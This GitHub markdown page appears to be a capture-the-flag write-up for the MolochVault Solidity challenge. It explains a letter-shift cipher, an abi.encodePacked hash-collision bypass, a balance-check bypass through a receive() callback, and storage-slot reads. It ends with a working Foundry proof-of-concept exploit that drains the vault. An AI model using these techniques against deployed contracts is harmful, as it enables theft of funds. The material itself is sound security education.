Skip to content

Latest commit

 

History

History
160 lines (118 loc) · 25 KB

MolochVault.md

File metadata and controls

160 lines (118 loc) · 25 KB

Details of decrypting Moloch-algorithm

We already know two string mappings:

  1. BLOODY PHARMACIST

    -> ZJQQBW*NFCPKCAKQR

  2. THE FUTURE OF HUMANITY REQUIRES THE SACRIFICE OF YOUR SHALLOW DESIRES

    -> RFG*DWRWPG*QD*FWKCLKRW*PGOWKPGQ*RFG*QCAPKDKAG*QD*WQWP*QFCJJQU*BGQKPGQ

    (I think there's a missing OF between SACRIFICE and YOUR)

This is my analysis:

  1. It looks like a simple shift, because the cipher length is identical to the plain text, and same ouput for same input charactors everywhere, eg: OO -> QQ
  2. I tried to use a loop to print the delta of each charactor, the delta is 2.
  3. Sometimes it's +2, sometimes -2, I found it is +2 when it's vowel(A/E/I/O/U), otherwise it's -2.
  4. After +/- 2, if it's not in range 'A-Z', rotate it by +/- 26.
  5. If it's space charactor ' ', replace with '*'

An implementation of the algorithm in Solidity:

// SPDX-License-Identifier: MIT
pragma solidity ^ 0.8.0;

contract Test {
	function molockAlgo(string memory plain) public pure returns(string memory) {
		bytes memory bs = bytes(plain);
		bytes memory ret = new bytes(bs.length);

		for(uint i = 0; i < bs.length; i++){
			bytes1 b = bs[i];

			if (b == 'A' || b=='E'||b== 'I'|| b== 'O'|| b== 'U') {
				b = bytes1(uint8(b) + 2);
				if (b > 'Z') {
					b = bytes1(uint8(b)-26);
				}
			} else if (b == ' ') {
					b = '*';
			} else {
				b = bytes1(uint8(b) - 2);
				if(b < 'A') {
					b = bytes1(uint8(b) + 26);
				}
			}
			ret[i] = b;
		}

		return string(ret);
	}
}

constructor parameters

We can simply find the constructor arguments during deployment on etherescan.

There is a decoded view, looks like:

-----Decoded View---------------
Arg [0] : molochPass (string): BLOODY PHARMACIST
Arg [1] : _b (string[2]): WHO DO YOU,SERVE?
Arg [2] : a (address[3]): 0x5B38Da6a701c568545dCfcB03FcB875f56beddC4,0xAb8483F64d9C6d1EcF9b849Ae677dD3315835cb2,0x4B20993Bc481177ec7E8f571ceCaE8A9e22C02db
Arg [3] : _passss (string[3]): KCLEQ,BGTGJQNGP,ZJQQBW*NFCPKCAKQR

Explain bypass for keccak256(abi.encodePacked())

The function abi.encodePacked() can be used to concat strings,

The abi.encodePacked("WHO DO YOU", "SERVE?") is equivalent to abi.encodePacked("WHO DO YOUSERVE?", "").

We use this to bypass the check require(keccak256(abi.encode(_openSecrete[1])) != keccak256(abi.encode(question[0])),"grant awarded!!");

Bypass the balance check

It requires to have more balance right after it send out 1 wei, so we need to send back 2 wei in our receive() callback.

Detailed formula for finding slot of dynamic struct

Immutable variables don't have a reserved storage slot.

This is how to access the variable cabals:

The storage layout can be printed with solc --storage-layout ...sol, it looks like:

slot 0: realHacker
slot 1: question
slot 3: cabals  <---- here

For array type, the slot holds the length of it, the first element is at sha3(slot), the element at IndexN can be accessed with: sha3(slot) + slot_size_of(Cabel)*IndexN

For example, to read cabals[7]: sha3(3) + 2*7

So, cabals[7].identity is sha3(3) + 2*7 + 0, the + 0 means identity is at slot 0, and cabals[7].password is sha3(3) + 2*7 + 1.

POC (Foundry)

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

import "forge-std/Test.sol";
import "../src/MolochVault.sol";

contract SolveMolochVault is Test {
	MOLOCH_VAULT vault;

	address deployer = makeAddr("deployer");


	function setUp() public {
		vm.startPrank(deployer);
		// deploy with bytecode copied from etherscan.com
		bytes memory all = hex"60e0604052604051620025b8380380620025b883398181016040528101906200002991906200071b565b336040516020016200003c91906200084e565b6040516020818303038152906040528051906020012060808181525050836040516020016200006c9190620008c8565b6040516020818303038152906040528051906020012060c0818152505082600060028110620000a0576200009f620008ec565b5b60200201516001600060028110620000bd57620000bc620008ec565b5b019081620000cc919062000b5b565b5082600160028110620000e457620000e3620008ec565b5b6020020151600180600281106200010057620000ff620008ec565b5b0190816200010f919062000b5b565b506001600060028110620001285762000127620008ec565b5b016001806002811062000140576200013f620008ec565b5b016040516020016200015492919062000cdc565b6040516020818303038152906040528051906020012060a0818152505060005b6003811015620002855760006040518060400160405280858460038110620001a157620001a0620008ec565b5b602002015173ffffffffffffffffffffffffffffffffffffffff168152602001848460038110620001d757620001d6620008ec565b5b60200201518152509050600381908060018154018082558091505060019003906000526020600020906002020160009091909190915060008201518160000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060208201518160010190816200026b919062000b5b565b5050505080806200027c9062000d33565b91505062000174565b505050505062000d80565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b620002f982620002ae565b810181811067ffffffffffffffff821117156200031b576200031a620002bf565b5b80604052505050565b60006200033062000290565b90506200033e8282620002ee565b919050565b600067ffffffffffffffff821115620003615762000360620002bf565b5b6200036c82620002ae565b9050602081019050919050565b60005b83811015620003995780820151818401526020810190506200037c565b60008484015250505050565b6000620003bc620003b68462000343565b62000324565b905082815260208101848484011115620003db57620003da620002a9565b5b620003e884828562000379565b509392505050565b600082601f830112620004085762000407620002a4565b5b81516200041a848260208601620003a5565b91505092915050565b600067ffffffffffffffff821115620004415762000440620002bf565b5b602082029050919050565b600080fd5b600062000468620004628462000423565b62000324565b905080602084028301858111156200048557620004846200044c565b5b835b81811015620004d357805167ffffffffffffffff811115620004ae57620004ad620002a4565b5b808601620004bd8982620003f0565b8552602085019450505060208101905062000487565b5050509392505050565b600082601f830112620004f557620004f4620002a4565b5b60026200050484828562000451565b91505092915050565b600067ffffffffffffffff8211156200052b576200052a620002bf565b5b602082029050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620005638262000536565b9050919050565b620005758162000556565b81146200058157600080fd5b50565b60008151905062000595816200056a565b92915050565b6000620005b2620005ac846200050d565b62000324565b90508060208402830185811115620005cf57620005ce6200044c565b5b835b81811015620005fc5780620005e7888262000584565b845260208401935050602081019050620005d1565b5050509392505050565b600082601f8301126200061e576200061d620002a4565b5b60036200062d8482856200059b565b91505092915050565b600067ffffffffffffffff821115620006545762000653620002bf565b5b602082029050919050565b600062000676620006708462000636565b62000324565b905080602084028301858111156200069357620006926200044c565b5b835b81811015620006e157805167ffffffffffffffff811115620006bc57620006bb620002a4565b5b808601620006cb8982620003f0565b8552602085019450505060208101905062000695565b5050509392505050565b600082601f830112620007035762000702620002a4565b5b6003620007128482856200065f565b91505092915050565b60008060008060c085870312156200073857620007376200029a565b5b600085015167ffffffffffffffff8111156200075957620007586200029f565b5b6200076787828801620003f0565b945050602085015167ffffffffffffffff8111156200078b576200078a6200029f565b5b6200079987828801620004dd565b9350506040620007ac8782880162000606565b92505060a085015167ffffffffffffffff811115620007d057620007cf6200029f565b5b620007de87828801620006eb565b91505092959194509250565b6000620007f78262000536565b9050919050565b60008160601b9050919050565b60006200081882620007fe565b9050919050565b60006200082c826200080b565b9050919050565b620008486200084282620007ea565b6200081f565b82525050565b60006200085c828462000833565b60148201915081905092915050565b600081519050919050565b600082825260208201905092915050565b600062000894826200086b565b620008a0818562000876565b9350620008b281856020860162000379565b620008bd81620002ae565b840191505092915050565b60006020820190508181036000830152620008e4818462000887565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200096357607f821691505b6020821081036200097957620009786200091b565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620009e37fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620009a4565b620009ef8683620009a4565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000a3c62000a3662000a308462000a07565b62000a11565b62000a07565b9050919050565b6000819050919050565b62000a588362000a1b565b62000a7062000a678262000a43565b848454620009b1565b825550505050565b600090565b62000a8762000a78565b62000a9481848462000a4d565b505050565b5b8181101562000abc5762000ab060008262000a7d565b60018101905062000a9a565b5050565b601f82111562000b0b5762000ad5816200097f565b62000ae08462000994565b8101602085101562000af0578190505b62000b0862000aff8562000994565b83018262000a99565b50505b505050565b600082821c905092915050565b600062000b306000198460080262000b10565b1980831691505092915050565b600062000b4b838362000b1d565b9150826002028217905092915050565b62000b66826200086b565b67ffffffffffffffff81111562000b825762000b81620002bf565b5b62000b8e82546200094a565b62000b9b82828562000ac0565b600060209050601f83116001811462000bd3576000841562000bbe578287015190505b62000bca858262000b3d565b86555062000c3a565b601f19841662000be3866200097f565b60005b8281101562000c0d5784890151825560018201915060208501945060208101905062000be6565b8683101562000c2d578489015162000c29601f89168262000b1d565b8355505b6001600288020188555050505b505050505050565b600081905092915050565b6000815462000c5c816200094a565b62000c68818662000c42565b9450600182166000811462000c86576001811462000c9c5762000cd3565b60ff198316865281151582028601935062000cd3565b62000ca7856200097f565b60005b8381101562000ccb5781548189015260018201915060208101905062000caa565b838801955050505b50505092915050565b600062000cea828562000c4d565b915062000cf8828462000c4d565b91508190509392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000d408262000a07565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff820362000d755762000d7462000d04565b5b600182019050919050565b60805160a05160c05161180862000db0600039600061029b01526000610364015260006106aa01526118086000f3fe6080604052600436106100595760003560e01c80631e16f68b1461006557806351f002e6146100a2578063639474da146100df5780638be58f20146100fb5780639b9c267914610139578063b57ebebe1461015557610060565b3661006057005b600080fd5b34801561007157600080fd5b5061008c60048036038101906100879190610ac7565b610192565b6040516100999190610b84565b60405180910390f35b3480156100ae57600080fd5b506100c960048036038101906100c49190610c04565b610235565b6040516100d69190610c4c565b60405180910390f35b6100f960048036038101906100f49190610e70565b610255565b005b34801561010757600080fd5b50610122600480360381019061011d9190610ac7565b6105a5565b604051610130929190610eda565b60405180910390f35b610153600480360381019061014e9190610f36565b610681565b005b34801561016157600080fd5b5061017c60048036038101906101779190610f63565b6107d7565b6040516101899190610c4c565b60405180910390f35b600181600281106101a257600080fd5b0160009150905080546101b490610fee565b80601f01602080910402602001604051908101604052809291908181526020018280546101e090610fee565b801561022d5780601f106102025761010080835404028352916020019161022d565b820191906000526020600020905b81548152906001019060200180831161021057829003601f168201915b505050505081565b60006020528060005260406000206000915054906101000a900460ff1681565b60004790508160006003811061026e5761026d61101f565b5b60200201516040516020016102839190610b84565b604051602081830303815290604052805190602001207f00000000000000000000000000000000000000000000000000000000000000001480156102ca575063b2d05e0034105b610309576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103009061109a565b60405180910390fd5b8160016003811061031d5761031c61101f565b5b6020020151826002600381106103365761033561101f565b5b602002015160405160200161034c9291906110f6565b604051602081830303815290604052805190602001207f0000000000000000000000000000000000000000000000000000000000000000146103c3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ba90611166565b60405180910390fd5b60016000600281106103d8576103d761101f565b5b016040516020016103e9919061121f565b60405160208183030381529060405280519060200120826001600381106104135761041261101f565b5b60200201516040516020016104289190610b84565b604051602081830303815290604052805190602001200361047e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104759061128d565b60405180910390fd5b60003373ffffffffffffffffffffffffffffffffffffffff1660016040516104a5906112de565b60006040518083038185875af1925050503d80600081146104e2576040519150601f19603f3d011682016040523d82523d6000602084013e6104e7565b606091505b50509050806104f557600080fd5b6000479050600183826105089190611322565b14610548576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161053f906113a2565b60405180910390fd5b60016000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050505050565b600481815481106105b557600080fd5b90600052602060002090600202016000915090508060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16908060010180546105fe90610fee565b80601f016020809104026020016040519081016040528092919081815260200182805461062a90610fee565b80156106775780601f1061064c57610100808354040283529160200191610677565b820191906000526020600020905b81548152906001019060200180831161065a57829003601f168201915b5050505050905082565b33604051602001610692919061140a565b604051602081830303815290604052805190602001207f0000000000000000000000000000000000000000000000000000000000000000148061071d57506000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b61075c576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161075390611471565b60405180910390fd5b60008173ffffffffffffffffffffffffffffffffffffffff166001604051610783906112de565b60006040518083038185875af1925050503d80600081146107c0576040519150601f19603f3d011682016040523d82523d6000602084013e6107c5565b606091505b50509050806107d357600080fd5b5050565b6000806003805480602002602001604051908101604052809291908181526020016000905b8282101561091657838290600052602060002090600202016040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200160018201805461088590610fee565b80601f01602080910402602001604051908101604052809291908181526020018280546108b190610fee565b80156108fe5780601f106108d3576101008083540402835291602001916108fe565b820191906000526020600020905b8154815290600101906020018083116108e157829003601f168201915b505050505081525050815260200190600101906107fc565b505050509050600081519050600060405180604001604052808773ffffffffffffffffffffffffffffffffffffffff168152602001868152509050600481908060018154018082558091505060019003906000526020600020906002020160009091909190915060008201518160000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555060208201518160010190816109d99190611628565b5050506000600480549050905060006001905083821015610a2f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a2690611746565b60405180910390fd5b80610a6f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a66906117b2565b60405180910390fd5b809550505050505092915050565b6000604051905090565b600080fd5b600080fd5b6000819050919050565b610aa481610a91565b8114610aaf57600080fd5b50565b600081359050610ac181610a9b565b92915050565b600060208284031215610add57610adc610a87565b5b6000610aeb84828501610ab2565b91505092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610b2e578082015181840152602081019050610b13565b60008484015250505050565b6000601f19601f8301169050919050565b6000610b5682610af4565b610b608185610aff565b9350610b70818560208601610b10565b610b7981610b3a565b840191505092915050565b60006020820190508181036000830152610b9e8184610b4b565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610bd182610ba6565b9050919050565b610be181610bc6565b8114610bec57600080fd5b50565b600081359050610bfe81610bd8565b92915050565b600060208284031215610c1a57610c19610a87565b5b6000610c2884828501610bef565b91505092915050565b60008115159050919050565b610c4681610c31565b82525050565b6000602082019050610c616000830184610c3d565b92915050565b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b610ca482610b3a565b810181811067ffffffffffffffff82111715610cc357610cc2610c6c565b5b80604052505050565b6000610cd6610a7d565b9050610ce28282610c9b565b919050565b600067ffffffffffffffff821115610d0257610d01610c6c565b5b602082029050919050565b600080fd5b600080fd5b600067ffffffffffffffff821115610d3257610d31610c6c565b5b610d3b82610b3a565b9050602081019050919050565b82818337600083830152505050565b6000610d6a610d6584610d17565b610ccc565b905082815260208101848484011115610d8657610d85610d12565b5b610d91848285610d48565b509392505050565b600082601f830112610dae57610dad610c67565b5b8135610dbe848260208601610d57565b91505092915050565b6000610dda610dd584610ce7565b610ccc565b90508060208402830185811115610df457610df3610d0d565b5b835b81811015610e3b57803567ffffffffffffffff811115610e1957610e18610c67565b5b808601610e268982610d99565b85526020850194505050602081019050610df6565b5050509392505050565b600082601f830112610e5a57610e59610c67565b5b6003610e67848285610dc7565b91505092915050565b600060208284031215610e8657610e85610a87565b5b600082013567ffffffffffffffff811115610ea457610ea3610a8c565b5b610eb084828501610e45565b91505092915050565b6000610ec482610ba6565b9050919050565b610ed481610eb9565b82525050565b6000604082019050610eef6000830185610ecb565b8181036020830152610f018184610b4b565b90509392505050565b610f1381610eb9565b8114610f1e57600080fd5b50565b600081359050610f3081610f0a565b92915050565b600060208284031215610f4c57610f4b610a87565b5b6000610f5a84828501610f21565b91505092915050565b60008060408385031215610f7a57610f79610a87565b5b6000610f8885828601610f21565b925050602083013567ffffffffffffffff811115610fa957610fa8610a8c565b5b610fb585828601610d99565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061100657607f821691505b60208210810361101957611018610fbf565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f7375636365737300000000000000000000000000000000000000000000000000600082015250565b6000611084600783610aff565b915061108f8261104e565b602082019050919050565b600060208201905081810360008301526110b381611077565b9050919050565b600081905092915050565b60006110d082610af4565b6110da81856110ba565b93506110ea818560208601610b10565b80840191505092915050565b600061110282856110c5565b915061110e82846110c5565b91508190509392505050565b7f4861686168616861212100000000000000000000000000000000000000000000600082015250565b6000611150600a83610aff565b915061115b8261111a565b602082019050919050565b6000602082019050818103600083015261117f81611143565b9050919050565b60008190508160005260206000209050919050565b600081546111a881610fee565b6111b28186610aff565b945060018216600081146111cd57600181146111e357611216565b60ff198316865281151560200286019350611216565b6111ec85611186565b60005b8381101561120e578154818901526001820191506020810190506111ef565b808801955050505b50505092915050565b60006020820190508181036000830152611239818461119b565b905092915050565b7f6772616e74206177617264656421210000000000000000000000000000000000600082015250565b6000611277600f83610aff565b915061128282611241565b602082019050919050565b600060208201905081810360008301526112a68161126a565b9050919050565b600081905092915050565b50565b60006112c86000836112ad565b91506112d3826112b8565b600082019050919050565b60006112e9826112bb565b9150819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061132d82610a91565b915061133883610a91565b92508282039050818111156113505761134f6112f3565b5b92915050565b7f73616372696669636520796f7572207368616c6c6f7720646573697265730000600082015250565b600061138c601e83610aff565b915061139782611356565b602082019050919050565b600060208201905081810360008301526113bb8161137f565b9050919050565b60008160601b9050919050565b60006113da826113c2565b9050919050565b60006113ec826113cf565b9050919050565b6114046113ff82610bc6565b6113e1565b82525050565b600061141682846113f3565b60148201915081905092915050565b7f4661722024726d20737563636573732121000000000000000000000000000000600082015250565b600061145b601183610aff565b915061146682611425565b602082019050919050565b6000602082019050818103600083015261148a8161144e565b9050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026114de7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826114a1565b6114e886836114a1565b95508019841693508086168417925050509392505050565b6000819050919050565b600061152561152061151b84610a91565b611500565b610a91565b9050919050565b6000819050919050565b61153f8361150a565b61155361154b8261152c565b8484546114ae565b825550505050565b600090565b61156861155b565b611573818484611536565b505050565b5b818110156115975761158c600082611560565b600181019050611579565b5050565b601f8211156115dc576115ad81611186565b6115b684611491565b810160208510156115c5578190505b6115d96115d185611491565b830182611578565b50505b505050565b600082821c905092915050565b60006115ff600019846008026115e1565b1980831691505092915050565b600061161883836115ee565b9150826002028217905092915050565b61163182610af4565b67ffffffffffffffff81111561164a57611649610c6c565b5b6116548254610fee565b61165f82828561159b565b600060209050601f8311600181146116925760008415611680578287015190505b61168a858261160c565b8655506116f2565b601f1984166116a086611186565b60005b828110156116c8578489015182556001820191506020850194506020810190506116a3565b868310156116e557848901516116e1601f8916826115ee565b8355505b6001600288020188555050505b505050505050565b7f4e6f6e6520616464656400000000000000000000000000000000000000000000600082015250565b6000611730600a83610aff565b915061173b826116fa565b602082019050919050565b6000602082019050818103600083015261175f81611723565b9050919050565b7f537461747573206465636c696e65640000000000000000000000000000000000600082015250565b600061179c600f83610aff565b91506117a782611766565b602082019050919050565b600060208201905081810360008301526117cb8161178f565b905091905056fea264697066735822122092954e6f9dc5cff5ad5461a377032c041610b194044518b51f4a566ffadc771d64736f6c6343000812003300000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000001000000000000000000000000005b38da6a701c568545dcfcb03fcb875f56beddc4000000000000000000000000ab8483f64d9c6d1ecf9b849ae677dd3315835cb20000000000000000000000004b20993bc481177ec7e8f571cecae8a9e22c02db00000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000011424c4f4f445920504841524d414349535400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000a57484f20444f20594f5500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000653455256453f0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e000000000000000000000000000000000000000000000000000000000000000054b434c45510000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000009424754474a514e4750000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000115a4a515142572a4e4643504b43414b5152000000000000000000000000000000";
		address vault_;
		assembly {
			vault_ := create(0, add(all, 0x20), mload(all))
		}
		vault = MOLOCH_VAULT(payable(vault_));

		// give vault 1 wei
		vm.deal(address(vault), 1 wei);
		// give this contract(the attacker) 10 wei
		vm.deal(address(this), 1 wei);

		vm.stopPrank();
	}

	function testhack() public {
		string[3] memory openSecret;

		openSecret[0] = "BLOODY PHARMACIST";
		openSecret[1] = "WHO DO YOUSERVE?";
		openSecret[2] = "";

		payBack = true; // need to repay 2 wei to bypass the balance check
		vault.uhER778(openSecret); // this should register us as `realHacker`

		payBack = false; // don't pay back 2 wei when receive 1 wei
		vault.sendGrant(payable(this)); // get back 1 wei that we send in the `receive()` previously 
		vault.sendGrant(payable(this)); // steal 1 wei

		// we have 1 wei in the first place, after stealing 1 wei, now we should have 2 wei
		require(address(this).balance == 2 wei, "steal 1 wei fail");
	}

	bool payBack;
	receive() external payable {
		if(payBack) {
			(bool success, ) = address(msg.sender).call{value:2 wei}("");
			require(success, "call fail");
		}
	}
}